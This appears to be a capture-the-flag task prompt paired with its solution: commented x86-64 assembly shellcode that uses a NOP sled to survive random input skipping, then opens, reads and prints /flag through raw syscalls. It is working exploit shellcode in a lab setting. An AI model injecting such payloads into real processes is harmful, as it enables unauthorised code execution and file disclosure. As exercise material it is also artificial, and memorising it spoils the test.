Write and execute shellcode to read the flag. A portion of the input is randomly skipped.
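BITS 64
section .text
global _start

;-----------------------------------------------------------------------
; Exercise payload: open("/flag", O_RDONLY), read up to BUF_SIZE bytes
; into a stack buffer, write them to stdout, then exit.
;
; Target:  Linux x86-64, raw syscalls only (no libc), entered at _start.
; Syscall: rax = nr; args in rdi, rsi, rdx; return in rax (negative =
;          -errno); rcx and r11 are clobbered by `syscall`.
; Stack:   assumes rsp points at usable, writable stack memory.
;
; The challenge discards a random portion of the input before executing
; it, so the code is preceded by a NOP sled: landing anywhere inside the
; sled falls through to shellcode_start.
;-----------------------------------------------------------------------

SYS_READ        equ 0
SYS_WRITE       equ 1
SYS_OPEN        equ 2
SYS_EXIT        equ 60
O_RDONLY        equ 0
STDOUT_FD       equ 1
BUF_SIZE        equ 0x100               ; bytes read per read() call
NOP_SLED_LEN    equ 0x800

_start:
nop_sled:
        times NOP_SLED_LEN nop

shellcode_start:
        ; Build the NUL-terminated string "/flag" on the stack.
        xor     eax, eax
        push    rax                     ; 8 zero bytes: the terminator
        mov     rbx, 0x67616c662f       ; "/flag" little-endian (bytes '/' 'f' 'l' 'a' 'g')
        push    rbx
        mov     rdi, rsp                ; rdi = "/flag"
        xor     esi, esi                ; rsi = O_RDONLY
        xor     edx, edx                ; rdx = mode (ignored without O_CREAT)
        mov     eax, SYS_OPEN
        syscall                         ; rax = fd, or -errno on failure

        ; open() reports failure as -errno; bail out instead of passing a
        ; negative "fd" on to read() and then a garbage length to write().
        test    rax, rax
        js      .fail

        ; Use a dedicated buffer below the string rather than reading over
        ; the string and whatever lies above rsp.
        sub     rsp, BUF_SIZE
        mov     rdi, rax                ; rdi = fd
        mov     rsi, rsp                ; rsi = buffer
        mov     edx, BUF_SIZE           ; rdx = max bytes to read
        mov     eax, SYS_READ
        syscall                         ; rax = bytes read, 0 at EOF, -errno on error

        test    rax, rax
        js      .fail                   ; read() failed
        ; rax == 0 (empty file) is fine: write(1, buf, 0) is a no-op.

        mov     rdx, rax                ; rdx = bytes to write
        mov     rsi, rsp                ; rsi = buffer (unchanged by read)
        mov     edi, STDOUT_FD
        mov     eax, SYS_WRITE
        syscall                         ; write(1, buf, n); return value not checked

        xor     edi, edi                ; exit status 0
        mov     eax, SYS_EXIT
        syscall

.fail:
        ; Non-zero exit so a failed open/read is visible to the caller
        ; instead of silently producing no output.
        mov     edi, 1
        mov     eax, SYS_EXIT
        syscall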